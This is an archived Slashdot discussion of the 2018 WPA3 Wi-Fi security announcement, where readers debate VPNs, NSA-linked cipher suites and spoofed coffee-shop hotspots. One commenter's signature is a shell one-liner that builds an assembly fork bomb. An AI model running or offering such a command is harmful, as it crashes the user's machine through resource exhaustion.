With WPA3, Wi-Fi Security is About To Get a Lot Tougher (zdnet.com)

← Back to Stories (view on slashdot.org)

With WPA3, Wi-Fi Security is About To Get a Lot Tougher (zdnet.com)

Posted by msmash on Tuesday January 9, 2018 @04:40AM from the next-up dept.

One of the biggest potential security vulnerabilities -- public Wi-Fi -- may soon get its fix. From a report: The Wi-Fi Alliance, an industry body made up of device makers including Apple, Microsoft, and Qualcomm, announced Monday its next-generation wireless network security standard, WPA3. The standard will replace WPA2, a near-two decades-old security protocol that's built in to protect almost every wireless device today -- including phones, laptops, and the Internet of Things.

One of the key improvements in WPA3 will aim to solve a common security problem: open Wi-Fi networks. Seen in coffee shops and airports, open Wi-Fi networks are convenient but unencrypted, allowing anyone on the same network to intercept data sent from other devices. WPA3 employs individualized data encryption, which scramble the connection between each device on the network and the router, ensuring secrets are kept safe and sites that you visit haven't been manipulated. Further reading: WPA3 WiFi Standard Announced After Researchers KRACKed WPA2 Three Months Ago

16 of 121 comments (clear)

Min score:

Reason:

Sort:

Freudian slip, anyone? by davecb · 2018-01-09 04:44 · Score: 5, Insightful

I'd hope security would get better, but maybe it does just get tougher (;-))
--dave
[English, ambiguity is your middle name]

--
davecb@spamcop.net
1. Re:Freudian slip, anyone? by arglebargle_xiv · 2018-01-09 09:51 · Score: 2
  
  And it's going to use:
  
  a 192-bit security suite, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems
  which decrypts to:
  
  a security suite created by a front for the NSA
  I think I'll stay with KRACK-patched WPA2, thanks.
Better, but not best. by MachineShedFred · 2018-01-09 04:46 · Score: 5, Insightful

Yes, this will prevent open-air sniffing of your packets.
VPN or HTTPS is still better, because after those packets arrive at the access point, they are unencrypted over whatever wire the AP is plugged into. WPA only covers the wireless link; HTTPS or VPN (or both!) encrypt much farther through the network, if not the whole way.
The first thing I do on an open WiFi network is connect to a VPN.

--
Slashdot still doesnâ(TM)t support Unicode after it was added to the HTML standard in 1997.
1. Re:Better, but not best. by Hal_Porter · 2018-01-09 04:50 · Score: 4, Insightful
  
  It doesn't hurt to have multiple redundant levels of security. I.e. HTTPS over VPN over WPA3.
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
2. Re:Better, but not best. by ledow · 2018-01-09 04:57 · Score: 3, Interesting
  
  Indeed. I used to VPN over my internal Wifi that only I knew the password for.
  WEP was cracked? Didn't matter.
  VPN software was cracked? Didn't matter.
  WPA was cracked? Didn't matter.
  So long as they aren't ALL cracked at the same time, you're safe. And there was no measurable latency or other additions, but full end-to-end verification and encryption, TWICE. I used to game CS over it.
  Give yourself enough layers and you don't have a window where you're vulnerable to compromise, whereas everyone just reliant on "WPA2 being secure" does. This gives you time to update, replace hardware, change settings, test if you're vulnerable, etc.
3. Re:Better, but not best. by sexconker · 2018-01-09 05:24 · Score: 3, Insightful
  
  A cert is just a password in a file. If you're using an external cert authority you have additional weaknesses with them and anyone up the chain (and governments).
  A strong password is the best security option there is.
  The only security benefit certs provide is revocation, but that can just as easily be implemented with passwords if you want. Just publish a list of hashes that are invalid. It can be a unique hash if you also publish a new salt alongside it, but it doesn't matter. (The username, hash, and salt are considered to be non-secret. If your encryption is strong and no one is using retarded passwords, it doesn't matter if those things are public.)
  Expiration already is handled with passwords.
4. Re:Better, but not best. by Anubis+IV · 2018-01-09 06:05 · Score: 4, Funny
  
  While all of that is good, nothing beats a wired Ethernet connection. That's why I always connect via Ethernet to wireless routers I bring with me that I've configured to act as bridges for the public WiFi hotspots I visit. I get the low latency and security of a wired connection while also gaining the benefits of wireless. It's the best of both worlds.
  Note that I said "routers", plural. For maximum convenience, I've purchased separate wireless routers for each public hotspot I visit, that way I don't have to waste any time reconfiguring them each time I visit a different hotspot. I just pull out the appropriate one, plug it into my UPS, and away I go with simple but secure Internet surfing. And adding VPN to the mix is as easy as using Ethernet to connect a VPN-serving router to the bridge-mode router, then using a cellular hotspot to connect to the VPN. You still get all the benefits of both a wired connection and VPN while being able to enjoy Internet access anywhere you can find a public hotspot. As a nice bonus, you only ever need one VPN-serving router and one cellular hotspot in total, rather than one device per hotspot as was the case with my bridge-mode routers, so it saves on costs.
  Some might try to suggest that even with those savings it still costs more than it's worth, but I don't think you can put a price on the level of convenience, security, and speed that I enjoy thanks to this setup.
Eh? by ledow · 2018-01-09 04:48 · Score: 5, Interesting

"One of the key improvements in WPA3 will aim to solve a common security problem: open Wi-Fi networks. Seen in coffee shops and airports, open Wi-Fi networks are convenient but unencrypted, allowing anyone on the same network to intercept data sent from other devices. WPA3 employs individualized data encryption, which scramble the connection between each device on the network and the router, ensuring secrets are kept safe and sites that you visit haven't been manipulated"
Sure. But your computer will still not know that the CoffeeShop SSID that they're connecting to was the one the shop set up, though, will they? There's no exclusivity for SSIDs and if there was, it'd be a denial-of-service opportunity.
Once connected, and a secret shared, yes. But with no password the initial connection is still giving people a chance to shove you on THEIR connection rather than the one you think, and then you can be WPA3-authenticated to them rather than what you thought without having a clue.
1. Re:Eh? by ArtemaOne · 2018-01-09 05:43 · Score: 2
  
  That's an interesting thought. You can fit a mobile wi-fi hotspot into a pocket. Give it the same name as the shop and you'll get half the people logging into yours for sure.
2. Re:Eh? by VeryFluffyBunny · 2018-01-09 05:43 · Score: 4, Interesting
  
  But your computer will still not know that the CoffeeShop SSID that they're connecting to was the one the shop set up, though, will they?
  Yes, this. Public Wifi needs something like unique domain names with signed certificates from an independent authority so that people know what they're connecting to and can be warned if it's insecure and therefore unsafe.
  
  --
  Debate is a form of harassment. Do not question my truth.
3. Re:Eh? by Njovich · 2018-01-09 05:54 · Score: 2
  
  Very little is known about WPA3, so it's hard to say if it will do anything about SSID spoofing.
Needs certification too by Anonymous Coward · 2018-01-09 04:51 · Score: 3, Insightful

There needs to also be some kind of certificate system added for open networks. Starbucks ought to be able to register their network with a CA, so that itâ(TM)s possible to verify that that open network with the SSID âoeStarbucksâ is not a phishing network.
1. Re:Needs certification too by squiggleslash · 2018-01-09 05:22 · Score: 2
  
  Why not just using the existing one? Or even the existing infrastructure? If the SSID is called open.starbucks.com, the protocol could involve the same kind of certificate as you'd use to sign a website https // open.starbucks.com
  All that's needed is the protocol. The who-owns-what bit's already done.
  
  --
  You are not alone. This is not normal. None of this is normal.
Legal implications by Ed+Avis · 2018-01-09 05:15 · Score: 2

I believe that in some countries like Germany it is illegal to run an open wireless network. (Crazy but true!) Would this proposed new standard address that, since the network would now be encrypted and no longer 'open'? Or does the law define an open network as one where users don't have to register for a username first? In that case, open Wifi would sadly remain illegal in Germany.

--
-- Ed Avis ed@membled.com
Re:That's nice but... by CaptainDork · 2018-01-09 05:55 · Score: 2

Coffee shops should drop TCP/IP and use their own, branded, in-house up-sell sugar packets.

--
It little behooves the best of us to comment on the rest of us.
Re:That's nice but... by AvitarX · 2018-01-09 06:09 · Score: 2

I think that's literally what they are addressing in the summary.
WPA3 will allow password less connections to be encrypted.
I assume it will give you a key, and then as soon as you connect your computer can verify with a cert authority to verify that it's a good key (similar to https).
If it is unsigned you'll get a warning (similar to https)
And then once you connect the key can be saved and you'll be immune from future hijacking (similar to ssh).
This is a big obvious feature I could never figure out why it wasn't in WiFi standards from the start (open encrypted networks).

--
Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg